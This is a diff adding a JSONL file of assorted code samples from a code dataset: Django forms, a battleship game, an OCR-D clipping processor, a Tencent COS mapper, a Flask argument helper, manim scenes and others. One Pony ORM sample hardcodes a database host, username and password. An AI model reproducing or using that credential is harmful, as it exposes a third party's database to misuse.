diff --git "a/824.jsonl" "b/824.jsonl" new file mode 100644--- /dev/null +++ "b/824.jsonl" @@ -0,0 +1,552 @@ +{"seq_id":"393996814","text":"import configparser\nimport os.path\nimport re\nimport sys\nimport urllib.parse\n\nconf = configparser.ConfigParser()\nconf.read(sys.argv[1])\nsrc_array = ''\nprepare_steps = ''\nfor sec in conf.sections():\n mobj = re.match(r'^submodule \"([^\"]+)\"$', sec)\n submodule_name = mobj.group(1)\n url = conf[sec]['url']\n url = url.replace('git://', 'https://')\n path = urllib.parse.urlparse(url).path\n basename = os.path.basename(path)\n if basename.endswith('.git'):\n basename = basename[:-len('.git')]\n src_array += f'\"git+{url}\"\\n'\n prepare_steps += f'git config submodule.{submodule_name}.url \"$srcdir/{basename}\"\\n'\n\nprint(src_array)\nprint(prepare_steps)\n","sub_path":"scripts/submodule-gen.py","file_name":"submodule-gen.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"359831183","text":"from .models import Comment,Product\nfrom django import forms\n\nclass CommentForm(forms.ModelForm):\n class Meta:\n model=Comment\n fields=['text']\n widget={\n 'text':forms.Textarea()\n }\n\nclass ProductForm(forms.ModelForm):\n class Meta:\n model=Product\n fields=['title','description','price','image']\n widget={\n 'description':forms.Textarea(),\n 'price':forms.IntegerField(),\n 'title':forms.TextInput(),\n 'image':forms.URLField()\n\n }","sub_path":"ecommerce/Product/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"114447691","text":"#!/usr/bin/python\r\n# -*- coding:utf8 -*-\r\nf = file('scores.txt')\r\nlines = f.readlines()\r\n#print lines\r\nf.close()\r\n\r\nresults = [] #创建一个list,使得每得到一个学生的总成绩后,就把它添入其中。\r\n\r\nfor line in lines:\r\n #print line\r\n data = line.split()\r\n #print data\r\n\r\n sum = 0 #对于每一条数据,都新建一个字符串,把学生的名字和算好的总成绩保存进去。最后再把这些字符串一起保存到文件中\r\n for score in data[1:]:\r\n sum += int(score)\r\n result = '%s \\t: %d\\n' % (data[0], sum)\r\n #print result\r\n\r\n results.append(result) #放在循环内部,得到一个学生的总成绩后,把它添加到list中。\r\n\r\n#print results\r\noutput = file('result.txt', 'w')\r\noutput.writelines(results) #全部成绩处理完毕后,保存results中内容至文件。因为results是一个字符串组成的list,这里我们直接用writelines\r\noutput.close()","sub_path":"calculationofscoresother.py","file_name":"calculationofscoresother.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"338460640","text":"from random import randint #importina a randint method\n\nboard = []\n\nfor x in range(5):\n board.append([\"O\"] * 5) #CREATE 5*5 MATRIX\n\n\ndef print_board(board): #define a method print_board\n for row in board:\n print (\" \".join(row)) #USE TO REPLACE , WITH \"\n\n\nprint (\"Let's play Battleship!\")\nprint_board(board) #calling print_board\n\n\ndef random_row(board): #makin a function random_row\n return randint(0,len(board) - 1)\n\n\ndef random_col(board): #making a function random_col\n return randint(0,len(board[0]) - 1)\n\n\nship_row = random_row(board) #assign values to variables as ship_row and ship_col\nship_col = random_col(board)\nprint (ship_row)\nprint (ship_col)\n\nfor turn in range(4): #creating a loop which gives user 4 tries to guess the location of ship\n if turn == 3:\n print (\"Over\")\n\n else:\n print (\"Turn\", turn + 1)\n guess_row = int(input(\"Guess Row\"))\n 
guess_col = int(input(\"Guess_Col\"))\n\n if guess_row == ship_row and guess_col == ship_col:\n print (\"Congratulations! You sunk my battleship!\")\n break\n else:\n if (guess_row < 0 or guess_row > 4) or (guess_col < 0 or guess_col > 4):\n print (\"Oops, its not even in the ocean.\")\n elif (board[guess_row][guess_col]==\"x\"):\n print (\"You quizzed dat already.\")\n else:\n print (\"You missed my battleship\")\n board[guess_row][guess_col]=\"x\"\n print_board(board)","sub_path":"battleship.py","file_name":"battleship.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"179836440","text":"from channels.asgi import get_channel_layer\n#import matplotlib.pyplot as plt\n#from mpl_toolkits.mplot3d import Axes3D\nfrom sklearn import svm\nimport asyncio\nimport json\nimport redis\nimport pandas as pd\nimport numpy as np\ndict_of_machs = {}\n\n\nclass MlTest():\n loop = asyncio.new_event_loop()\n period = 20\n status = 'idle'\n model_mode = 'flat'\n redis_channel = redis.StrictRedis(host='localhost', port=6379, db=0)\n p = redis_channel.pubsub()\n path = '192.168.1.20'\n p.subscribe(path)\n \n data_set = pd.DataFrame(columns=['time', 'lights', 'click'])\n temp_data_time = 0\n temp_data_light = 0\n temp_data_click = 0\n ml_models = {}\n temp_X = []\n temp_y = []\n \n def __init__(self, name):\n self.name = name\n \n def calc_model(self):\n clf = svm.SVC()\n self.ml_models['ml1'] = clf.fit(self.temp_X, self.temp_y)\n \n async def get_nodes_data(self):\n while self.status != 'stop_timer':\n message = self.p.get_message()\n if message:\n try:\n parsed_data = json.loads(message['data'].decode(\"utf-8\"))\n self.temp_data_light = parsed_data['pin_light']\n print(self.temp_data_light)\n except:\n pass\n await asyncio.sleep(0.001)\n \n async def ml_timer(self):\n channels_layer = get_channel_layer()\n while self.status != 'stop_timer':\n timer = 0\n count = {}\n answer = {}\n while timer != self.period and self.status == 'run_timer':\n timer += 1\n count['timer'] = timer\n channels_layer.send_group('ml_ch', {'text': json.dumps(count)})\n self.temp_data_time = timer\n print(timer)\n \n if self.model_mode == 'learning':\n if self.temp_data_light >= 500:\n self.temp_X.append([self.temp_data_time, self.temp_data_light])\n self.temp_y.append([1])\n else:\n self.temp_X.append([self.temp_data_time, self.temp_data_light])\n self.temp_y.append([0])\n \n if self.model_mode == 'working' and 'ml1' in self.ml_models:\n answer['answer'] = str(self.ml_models['ml1'].predict([[self.temp_data_time, self.temp_data_light]])).replace(\"[\", \"\").replace(\"]\", \"\")\n print(answer['answer'])\n channels_layer.send_group('ml_ch', {'text': json.dumps(answer)})\n \n await asyncio.sleep(1)\n \n if self.status == 'stop_timer':\n self.ml_models = {}\n self.temp_X.clear()\n self.temp_y.clear()\n self.loop.stop()\n break\n \n def taped(self):\n if self.model_mode == 'learning':\n self.temp_X.append([self.temp_data_time, self.temp_data_light])\n self.temp_y.append([1])\n \n async def run(self):\n tasks = [self.ml_timer(), self.get_nodes_data()]\n await asyncio.wait(tasks)\n \n def run_maschine(self):\n asyncio.set_event_loop(self.loop)\n asyncio.ensure_future(self.run())\n self.loop.run_forever()\n \n def get_data_set(self):\n channels_layer = get_channel_layer()\n channels_layer.send_group('ml_ch', {'text': json.dumps({'raw_data_set': {'X': self.temp_X, 'y': self.temp_y}})})\n\n\ndef ml_test(request):\n print('req : ', 
request['text'])\n get_channel_layer().send_group('ml_ch', {'text': json.dumps('start')})\n \n if request['text'] == 'run_timer' and 'mach' not in dict_of_machs:\n dict_of_machs['mach'] = MlTest('new')\n dict_of_machs['mach'].status = 'run_timer'\n dict_of_machs['mach'].run_maschine()\n try:\n print('running_machine', dict_of_machs['mach'].name, dict_of_machs['mach'].status)\n except:\n pass\n \n if request['text'] == 'stop_timer':\n dict_of_machs['mach'].status = 'stop_timer'\n print('stopped_machine', dict_of_machs['mach'].name)\n dict_of_machs['mach'].temp_X.clear()\n dict_of_machs['mach'].temp_y.clear()\n dict_of_machs.clear()\n #del dict_of_machs['mach']\n\n try:\n print(dict_of_machs['mach'])\n print(dict_of_machs)\n except:\n print('empty!!!')\n\n if request['text'] == 'learning':\n dict_of_machs['mach'].model_mode = 'learning'\n \n if request['text'] == 'working':\n dict_of_machs['mach'].calc_model()\n dict_of_machs['mach'].model_mode = 'working'\n print(dict_of_machs['mach'].temp_X, dict_of_machs['mach'].temp_y)\n \n if request['text'] == 'taped':\n dict_of_machs['mach'].taped()\n \n if request['text'] == 'get_data_set':\n try:\n dict_of_machs['mach'].get_data_set()\n except:\n pass","sub_path":"ShelterSmartHome/apps/ml/ml_testing.py","file_name":"ml_testing.py","file_ext":"py","file_size_in_byte":5055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"433746131","text":"from tkinter import *\r\nfrom PIL import ImageTk,Image\r\n\r\nroot = Tk()\r\nroot.title(\"Sliders\")\r\nroot.iconbitmap(\"C:/Users/borbe/Pictures/code.ico\")\r\nroot.geometry(\"400x400\")\r\n\r\nvar = StringVar()\r\nvar.set(\"On\")\r\n\r\ndef show():\r\n label = Label(root, text=var.get()).pack()\r\n\r\n\r\ncheckbox = Checkbutton(root, text=\"check this box ;D\", variable=var, onvalue=\"On\", offvalue=\"Off\")\r\ncheckbox.pack()\r\n\r\n\r\nbutton = Button(root, text=\"checked?\", command=show).pack()\r\n\r\nmainloop()\r\n","sub_path":"checkbox.py","file_name":"checkbox.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"598012954","text":"from __future__ import absolute_import\n\nimport os.path\nimport numpy as np\nfrom PIL import Image, ImageStat, ImageOps\nfrom scipy.ndimage import filters\nfrom shapely.geometry import Polygon\nfrom shapely.prepared import prep\n\nfrom ocrd_modelfactory import page_from_file\nfrom ocrd_models.ocrd_page import (\n MetadataItemType,\n LabelsType, LabelType,\n to_xml, AlternativeImageType\n)\nfrom ocrd import Processor\nfrom ocrd_utils import (\n getLogger,\n concat_padded,\n coordinates_of_segment,\n polygon_from_points,\n bbox_from_polygon,\n image_from_polygon,\n polygon_mask,\n crop_image,\n MIMETYPE_PAGE\n)\n\nfrom .. 
import get_ocrd_tool\nfrom .ocrolib import midrange, morph\nfrom .common import (\n # binarize,\n pil2array, array2pil\n)\n\nTOOL = 'ocrd-cis-ocropy-clip'\nLOG = getLogger('processor.OcropyClip')\nFALLBACK_FILEGRP_IMG = 'OCR-D-IMG-CLIP'\n\nclass OcropyClip(Processor):\n\n def __init__(self, *args, **kwargs):\n self.ocrd_tool = get_ocrd_tool()\n kwargs['ocrd_tool'] = self.ocrd_tool['tools'][TOOL]\n kwargs['version'] = self.ocrd_tool['version']\n super(OcropyClip, self).__init__(*args, **kwargs)\n if hasattr(self, 'output_file_grp'):\n try:\n self.page_grp, self.image_grp = self.output_file_grp.split(',')\n except ValueError:\n self.page_grp = self.output_file_grp\n self.image_grp = FALLBACK_FILEGRP_IMG\n LOG.info(\"No output file group for images specified, falling back to '%s'\", FALLBACK_FILEGRP_IMG)\n\n def process(self):\n \"\"\"Clip text regions / lines of the workspace at intersections with neighbours.\n\n Open and deserialise PAGE input files and their respective images,\n then iterate over the element hierarchy down to the requested\n ``level-of-operation``.\n\n Next, get each segment image according to the layout annotation (by cropping\n via coordinates into the higher-level image), as well as all its neighbours',\n binarize them (without deskewing), and make a connected component analysis.\n (Segments must not already have AlternativeImage annotated, otherwise they\n will be skipped.)\n\n Then, for each section of overlap with a neighbour, re-assign components\n which are only contained in the neighbour by clipping them to white (background),\n and export the (final) result as image file.\n\n Add the new image file to the workspace with the fileGrp USE given\n in the second position of the output fileGrp, or ``OCR-D-IMG-CLIP``,\n and an ID based on the input file and input element.\n\n Reference each new image in the AlternativeImage of the element.\n\n Produce a new output file by serialising the resulting hierarchy.\n \"\"\"\n # This makes best sense for overlapping segmentation, like current GT\n # or Tesseract layout analysis. Most notably, it can suppress graphics\n # and separators within or across a region or line. It _should_ ideally\n # be run after binarization (on page level for region-level clipping,\n # and on the region level for line-level clipping), because the\n # connected component analysis after implicit binarization could be\n # suboptimal, and the explicit binarization after clipping could be,\n # too. 
However, region-level clipping _must_ be run before region-level\n # deskewing, because that would make segments incomensurable with their\n # neighbours.\n level = self.parameter['level-of-operation']\n\n for (n, input_file) in enumerate(self.input_files):\n LOG.info(\"INPUT FILE %i / %s\", n, input_file.pageId or input_file.ID)\n file_id = input_file.ID.replace(self.input_file_grp, self.image_grp)\n if file_id == input_file.ID:\n file_id = concat_padded(self.image_grp, n)\n\n pcgts = page_from_file(self.workspace.download_file(input_file))\n page_id = pcgts.pcGtsId or input_file.pageId or input_file.ID # (PageType has no id)\n page = pcgts.get_Page()\n \n # add metadata about this operation and its runtime parameters:\n metadata = pcgts.get_Metadata() # ensured by from_file()\n metadata.add_MetadataItem(\n MetadataItemType(type_=\"processingStep\",\n name=self.ocrd_tool['steps'][0],\n value=TOOL,\n Labels=[LabelsType(\n externalModel=\"ocrd-tool\",\n externalId=\"parameters\",\n Label=[LabelType(type_=name,\n value=self.parameter[name])\n for name in self.parameter.keys()])]))\n \n page_image, page_coords, page_image_info = self.workspace.image_from_page(\n page, page_id, feature_selector='binarized')\n if self.parameter['dpi'] > 0:\n zoom = 300.0/self.parameter['dpi']\n elif page_image_info.resolution != 1:\n dpi = page_image_info.resolution\n if page_image_info.resolutionUnit == 'cm':\n dpi *= 2.54\n LOG.info('Page \"%s\" uses %f DPI', page_id, dpi)\n zoom = 300.0/dpi\n else:\n zoom = 1\n\n regions = list(page.get_TextRegion())\n num_texts = len(regions)\n regions += (\n page.get_AdvertRegion() +\n page.get_ChartRegion() +\n page.get_ChemRegion() +\n page.get_GraphicRegion() +\n page.get_ImageRegion() +\n page.get_LineDrawingRegion() +\n page.get_MathsRegion() +\n page.get_MusicRegion() +\n page.get_NoiseRegion() +\n page.get_SeparatorRegion() +\n page.get_TableRegion() +\n page.get_UnknownRegion())\n if not num_texts:\n LOG.warning('Page \"%s\" contains no text regions', page_id)\n background = ImageStat.Stat(page_image).median[0]\n if level == 'region':\n background_image = Image.new('L', page_image.size, background)\n page_array = pil2array(page_image)\n page_bin = np.array(page_array <= midrange(page_array), np.uint8)\n # in absolute coordinates merely for comparison/intersection\n shapes = [Polygon(polygon_from_points(region.get_Coords().points))\n for region in regions]\n # in relative coordinates for mask/cropping\n polygons = [coordinates_of_segment(region, page_image, page_coords)\n for region in regions]\n masks = [pil2array(polygon_mask(page_image, polygon)).astype(np.uint8)\n for polygon in polygons]\n for i, mask in enumerate(masks[num_texts:], num_texts):\n # for non-text regions, extend mask by 3 pixels in each direction\n # to ensure they do not leak components accidentally\n # (accounts for bad cropping of such regions in GT):\n masks[i] = filters.maximum_filter(mask, 7)\n for i, region in enumerate(regions):\n if i >= num_texts:\n break # keep non-text regions unchanged\n if level == 'region':\n if region.get_AlternativeImage():\n # FIXME: This should probably be an exception (bad workflow configuration).\n LOG.warning('Page \"%s\" region \"%s\" already contains image data: skipping',\n page_id, region.id)\n continue\n shape = prep(shapes[i])\n neighbours = [(regionj, maskj) for shapej, regionj, maskj\n in zip(shapes[:i] + shapes[i+1:],\n regions[:i] + regions[i+1:],\n masks[:i] + masks[i+1:])\n if shape.intersects(shapej)]\n if neighbours:\n 
self.process_segment(region, masks[i], polygons[i],\n neighbours, background_image,\n page_image, page_coords, page_bin,\n input_file.pageId, file_id + '_' + region.id)\n continue\n # level == 'line':\n lines = region.get_TextLine()\n if not lines:\n LOG.warning('Page \"%s\" region \"%s\" contains no text lines', page_id, region.id)\n continue\n region_image, region_coords = self.workspace.image_from_segment(\n region, page_image, page_coords, feature_selector='binarized')\n background_image = Image.new('L', region_image.size, background)\n region_array = pil2array(region_image)\n region_bin = np.array(region_array <= midrange(region_array), np.uint8)\n # in absolute coordinates merely for comparison/intersection\n shapes = [Polygon(polygon_from_points(line.get_Coords().points))\n for line in lines]\n # in relative coordinates for mask/cropping\n polygons = [coordinates_of_segment(line, region_image, region_coords)\n for line in lines]\n masks = [pil2array(polygon_mask(region_image, polygon)).astype(np.uint8)\n for polygon in polygons]\n for j, line in enumerate(lines):\n if line.get_AlternativeImage():\n # FIXME: This should probably be an exception (bad workflow configuration).\n LOG.warning('Page \"%s\" region \"%s\" line \"%s\" already contains image data: skipping',\n page_id, region.id, line.id)\n continue\n shape = prep(shapes[j])\n neighbours = [(linej, maskj) for shapej, linej, maskj\n in zip(shapes[:j] + shapes[j+1:],\n lines[:j] + lines[j+1:],\n masks[:j] + masks[j+1:])\n if shape.intersects(shapej)]\n if neighbours:\n self.process_segment(line, masks[j], polygons[j],\n neighbours, background_image,\n region_image, region_coords, region_bin,\n input_file.pageId, file_id + '_' + region.id + '_' + line.id)\n\n # update METS (add the PAGE file):\n file_id = input_file.ID.replace(self.input_file_grp, self.page_grp)\n if file_id == input_file.ID:\n file_id = concat_padded(self.page_grp, n)\n file_path = os.path.join(self.page_grp, file_id + '.xml')\n out = self.workspace.add_file(\n ID=file_id,\n file_grp=self.page_grp,\n pageId=input_file.pageId,\n local_filename=file_path,\n mimetype=MIMETYPE_PAGE,\n content=to_xml(pcgts))\n LOG.info('created file ID: %s, file_grp: %s, path: %s',\n file_id, self.page_grp, out.local_filename)\n\n def process_segment(self, segment, segment_mask, segment_polygon, neighbours,\n background_image, parent_image, parent_coords, parent_bin,\n page_id, file_id):\n # initialize AlternativeImage@comments classes from parent, except\n # for those operations that can apply on multiple hierarchy levels:\n features = ','.join(\n [feature for feature in parent_coords['features'].split(',')\n if feature in ['binarized', 'grayscale_normalized',\n 'despeckled', 'dewarped']]) + ',clipped'\n # mask segment within parent image:\n segment_image = image_from_polygon(parent_image, segment_polygon)\n segment_bbox = bbox_from_polygon(segment_polygon)\n for neighbour, neighbour_mask in neighbours:\n # find connected components that (only) belong to the neighbour:\n intruders = segment_mask * morph.keep_marked(parent_bin, neighbour_mask > 0) # overlaps neighbour\n intruders = morph.remove_marked(intruders, segment_mask > neighbour_mask) # but exclusively\n num_intruders = np.count_nonzero(intruders)\n num_foreground = np.count_nonzero(segment_mask * parent_bin)\n if not num_intruders:\n continue\n if num_intruders / num_foreground > 1.0 - self.parameter['min_fraction']:\n LOG.info('Too many intruders (%d/%d) from neighbour \"%s\" in segment \"%s\" on page \"%s\"',\n 
num_intruders, num_foreground, neighbour.id, segment.id, page_id)\n continue\n LOG.debug('segment \"%s\" vs neighbour \"%s\": suppressing %d pixels on page \"%s\"',\n segment.id, neighbour.id, np.count_nonzero(intruders), page_id)\n clip_mask = array2pil(intruders)\n segment_image.paste(background_image, mask=clip_mask) # suppress in raw image\n if segment_image.mode in ['RGB', 'L', 'RGBA', 'LA']:\n # for consumers that do not have to rely on our\n # guessed background color, but can cope with transparency:\n segment_image.putalpha(ImageOps.invert(clip_mask))\n # recrop segment into rectangle, just as image_from_segment would do\n # (and also clipping with background colour):\n segment_image = crop_image(segment_image,box=segment_bbox)\n # update METS (add the image file):\n file_path = self.workspace.save_image_file(\n segment_image,\n file_id=file_id,\n page_id=page_id,\n file_grp=self.image_grp)\n # update PAGE (reference the image file):\n segment.add_AlternativeImage(AlternativeImageType(\n filename=file_path,\n comments=features))\n","sub_path":"ocrd_cis/ocropy/clip.py","file_name":"clip.py","file_ext":"py","file_size_in_byte":14529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"502536657","text":"from openerp import models, fields, api\nfrom openerp.osv import fields, osv\nfrom openerp import tools\nfrom openerp.tools.translate import _\n\nimport logging\n_logger = logging.getLogger(__name__)\n\nclass crm_case_section(osv.osv):\n\n _inherit = \"crm.case.section\"\n\n _columns = {}\n _defaults = {}\n\n def write(self, cr, uid, ids, vals, context=None):\n \n rtn= super(crm_case_section, self).write(cr, uid, ids, vals, context=context)\n if vals.get('member_ids'):\n user=self.pool.get('res.users')\n for member_id in vals['member_ids'][0][2]:\n _logger.info(\"member_id %r\",member_id)\n user.write( cr, uid, member_id, {'default_section_id':ids[0]}, context=None)\n\n #if vals['invoiced_forecast']:\n #self.make_challenges(cr,uid,ids) \n\n return rtn\n\n def make_challenges(self,cr,uid,section_id):\n section=self.pool.get('crm.case.section')\n #res_user=self.pool.get('res.user')\n hr_employee=self.pool.get('hr.employee')\n section_data=section.browse(cr,uid,section_id[0], context=None)\n hr_employee_id=hr_employee.search(cr,uid,[('user_id','in' ,section_data['member_ids'])], context=None)\n \n\n\n\n\n\ncrm_case_section()\n\n\n","sub_path":"section.py","file_name":"section.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"93105616","text":"from django.shortcuts import render, redirect\n# from django.contrib.auth.forms import UserCreationForm\nfrom django.contrib import messages\nfrom .forms import UserOurRegistration, UserUpdateForm, ProfileEdit\nfrom django.contrib.auth.decorators import login_required\n\n\ndef register(request, **kwargs):\n if request.method == 'POST':\n form = UserOurRegistration(request.POST)\n print(form)\n if form.is_valid():\n form.save(**kwargs)\n username = form.cleaned_data.get('username')\n messages.success(request,\n f'Аккаунт {username} был успешно создан!Введите имя пользователя и пароль для авторизации.')\n return redirect('user')\n else:\n form = UserOurRegistration()\n return render(request, 'users/registration.html', {'form': form, 'title': 'Страница регистрации пользователя'})\n\n\n@login_required\ndef showprofile(request, **kwargs):\n if request.method == \"POST\":\n edit_profile = 
ProfileEdit(request.POST, request.FILES, instance=request.user.profile)\n update_user = UserUpdateForm(request.POST, instance=request.user)\n\n if edit_profile.is_valid() and update_user.is_valid():\n edit_profile.save(**kwargs)\n update_user.save(**kwargs)\n messages.success(request, f'Аккаунт был успешно обновлен')\n return redirect('profile')\n else:\n edit_profile = ProfileEdit(instance=request.user.profile)\n update_user = UserUpdateForm(instance=request.user)\n\n data = {\n 'edit_profile': edit_profile,\n 'update_user': update_user\n }\n\n return render(request, 'users/profile.html', data)\n","sub_path":"15_lesson(django)/itProger/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"621603242","text":"\"\"\"\nhandle args from post and get\nshould also have put, delete and so on\n\"\"\"\nfrom flask import request\nfrom flask_restful import reqparse\nfrom flask_restplus import abort\nfrom werkzeug.datastructures import FileStorage\n\n\ndef get_request_args(arg_name, arg_type, required=True):\n \"\"\"\n It will get the argument value according to the name.\n And it will check whether required\n :param arg_name: the argument name\n :param arg_type: the argument type\n :param required: whether necessary\n :return: the argument value\n \"\"\"\n parser = reqparse.RequestParser()\n parser.add_argument(arg_name, type=arg_type)\n args = parser.parse_args()\n\n res = args.get(arg_name)\n\n if res is None and required:\n abort(400, \"Missing args: %s\" % arg_name)\n\n return res\n\n\ndef get_request_file(arg_name):\n \"\"\"\n Get files in the requests according to file name\n :param arg_name: the files name\n :return: list of files or None\n \"\"\"\n parser = reqparse.RequestParser()\n parser.add_argument(arg_name, location='files', type=FileStorage, action='append')\n args = parser.parse_args()\n files = args.get(arg_name)\n return files\n\n\n# get the header token\ndef get_header(req, required=True):\n token = req.headers.get('Authorization', None)\n if not token and required:\n abort(403, \"Not get the token\")\n\n return token\n\n\ndef format_str(info):\n \"\"\"\n replace ' into '' for database format\n :param info: the string\n :return: new string convert ' into ''\n \"\"\"\n return info.replace('\\'', '\\'\\'')\n","sub_path":"backend/util/request_handling.py","file_name":"request_handling.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"32095375","text":"# -*- coding: utf8 -*-\nimport mapper_triggered as Mapper\nimport datetime\nfrom qcloud_cos_v5 import CosConfig\nfrom qcloud_cos_v5 import CosS3Client\nfrom qcloud_cos_v5 import CosServiceError\nimport logging\nimport sys\nimport os\n\nregion = 'ap-guangzhou' # Modify the area according to the actual situation. 
根据实际情况,修改地域\nmiddle_stage_bucket = os.environ.get('Bucket') \n\nlogging.basicConfig(level=logging.INFO, stream=sys.stdout)\nlogger = logging.getLogger()\nlogger.setLevel(level=logging.INFO)\n\n\ndef map_caller(event, context, cos_client):\n appid = event['Records'][0]['cos']['cosBucket']['appid']\n bucket = event['Records'][0]['cos']['cosBucket']['name'] +'-'+ appid\n key = event['Records'][0]['cos']['cosObject']['key']\n key = key.replace('/' + str(appid) + '/' + event['Records'][0]['cos']['cosBucket']['name'] + '/', '', 1)\n logger.info(\"Key is \" + key)\n middle_bucket = middle_stage_bucket\n middle_file_key = '/' + 'middle_' + key.split('/')[-1]\n return Mapper.do_mapping(cos_client, bucket, key, middle_bucket, middle_file_key)\n\ndef main_handler(event, context):\n logger.info(\"start main handler\")\n if \"Records\" not in event.keys():\n return {\"errorMsg\": \"event is not come from cos\"}\n\n secret_id = os.environ.get('TENCENT_SECRET_ID') # Using the secterId in environment variables. 使用环境变量中的 secretId\n secret_key = os.environ.get('TENCENT_SECRET_KEY') # Using the secretKey in environment variables. 使用环境变量中的 secretKey\n config = CosConfig(Region=region, SecretId=secret_id, SecretKey=secret_key,)\n cos_client = CosS3Client(config)\n\n start_time = datetime.datetime.now()\n res = map_caller(event, context,cos_client)\n end_time = datetime.datetime.now()\n print(\"data mapping duration: \" + str((end_time-start_time).microseconds/1000) + \"ms\")\n if res == 0:\n return \"Data mapping SUCCESS\"\n else:\n return \"Data mapping FAILED\"","sub_path":"Map_Reduce_Demo/fun_map/map_function.py","file_name":"map_function.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"40842206","text":"from pony.orm import *\r\n\r\ndb = Database()\r\n\r\nclass Restautants(db.Entity):\r\n name = Required(str, unique=True)\r\n owner = Required(str)\r\n folk = Optional(bool)\r\n\r\n def __str__(self):\r\n return str(self.name)\r\n\r\nPOSTGRES_URL = 'salt.db.elephantsql.com'\r\nPOSTGRES_USER = 'qhpmvcxf'\r\nPOSTGRES_PW = 'KVyxuSnUjHqmS8cv87HmKljukR7IKAXA'\r\nPOSTGRES_DB = 'qhpmvcxf'\r\n\r\ndb.bind(\r\n 'postgres',\r\n user=POSTGRES_USER,\r\n password=POSTGRES_PW,\r\n host=POSTGRES_URL,\r\n database=POSTGRES_DB,\r\n port='5432'\r\n)\r\n\r\ndb.generate_mapping(create_tables=True)","sub_path":"Python 3/Clase 11/flask/project/server/pony.py","file_name":"pony.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"348375769","text":"from Ag.MyCode.imports_ag import *\r\n\r\nclass MusicMai(Scene):\r\n def construct(self):\r\n txts = [\r\n \"1 购买工业标准比较高的国家和地区所生产的钢琴\",\r\n \"2 买新琴,尽量不买二手琴\",\r\n \"3 找会弹钢琴的人去试试琴,感受一下手感和音色\",\r\n ]\r\n text_vg = VGroup()\r\n for txt in txts:\r\n text = Text(txt,font=\"Microsoft YaHei Bold\",size=1)\r\n text_vg.add(text)\r\n text_vg.arrange(DOWN,aligned_edge = LEFT,buff=MED_SMALL_BUFF)\r\n\r\n for text in text_vg: \r\n self.play(Write(text))\r\n self.wait()\r\n self.wait()\r\n\r\nclass Music1(Scene):\r\n def construct(self):\r\n text1 = Text(\r\n \"三个层次\",\r\n font=\"Source Han Sans CN\",\r\n weight='BOLD',\r\n size=1.68\r\n )\r\n self.play(FadeIn(text1,scale=0.5))\r\n self.wait()\r\n text2 = TexText(\r\n \"层次一 : 欣赏音乐\",\r\n \"层次二 : 自娱自乐\",\r\n \"层次三 : 玩音乐\",\r\n )\\\r\n .arrange(\r\n DOWN,\r\n aligned_edge=LEFT\r\n )\r\n self.remove(text1)\r\n self.play(Write(text2[0]))\r\n self.wait()\r\n 
self.play(Write(text2[1]))\r\n self.wait()\r\n self.play(Write(text2[2]))\r\n self.wait()\r\n\r\nclass Music2(Scene):\r\n def construct(self):\r\n text1 = Text(\r\n \"旧琴练习\",\r\n font=\"Source Han Sans CN\",\r\n weight='BOLD',\r\n size=1.238\r\n ).shift(0.238*UP)\r\n\r\n text2 = Text(\r\n \"新琴练习\",\r\n font=\"Source Han Sans CN\",\r\n weight='BOLD',\r\n size=1.238\r\n ).shift(0.238*UP)\r\n\r\n self.play(FadeIn(text1,scale=0.5))\r\n self.wait()\r\n self.remove(text1)\r\n self.play(FadeIn(text2,scale=0.5))\r\n self.wait()\r\n\r\nclass Music5(Scene):\r\n def construct(self):\r\n # text1 = Text(\r\n # \"要不要把音乐作为专业发展方向?\",\r\n # font=\"思源黑体 CN Heavy\",\r\n # size=1.36\r\n # ).shift(0.238*UP)\r\n\r\n # self.play(FadeInFromLarge(text1))\r\n # self.wait()\r\n\r\n # text2 = Text(\r\n # \"艺考≠易考\",\r\n # font=\"思源黑体 CN Heavy\",\r\n # size=2.2\r\n # ).shift(0.238*UP).set_color_by_gradient(YELLOW, RED)\r\n # self.play(FadeInFromLarge(text2))\r\n # self.wait()\r\n\r\n # text3 = Text(\r\n # \"就 业 难\",\r\n # font=\"思源黑体 CN Heavy\",\r\n # size=2.2\r\n # ).shift(0.238*UP)\r\n # self.play(Write(text3))\r\n # self.wait()\r\n\r\n text1 = Text(\r\n \"如何选购钢琴?\",\r\n font=\"Microsoft YaHei Bold\",\r\n size=1.5\r\n ).shift(0.238*UP)\r\n\r\n self.play(FadeInFromLarge(text1))\r\n self.wait(2)\r\n\r\n\r\n\r\nclass Music6(Scene):\r\n def construct(self):\r\n name_chinese = Text(\"艾伦·格林斯潘\",font=\"思源黑体 CN Heavy\",size=2.2)\r\n name_english = Text(\"Alan Greenspan\",font=\"Times New Roman\",color = BLUE,size=2)\r\n birthday = Text(\"1926年3月6日-\",font=\"思源黑体 CN\",size=1.2)\r\n introduction = Text(\r\n \"第13任美国联邦储备委员会理事会主席\",\r\n font=\"思源黑体 CN Heavy\",\r\n size=1.5\r\n )\r\n all_txt = VGroup(\r\n name_chinese,\r\n name_english,\r\n birthday,\r\n introduction\r\n ).arrange(\r\n DOWN,\r\n aligned_edge=LEFT,\r\n buff = 0.5\r\n ).scale(0.36).to_corner(DL).shift(UP*0.618)\r\n ret_buff = 0.5\r\n 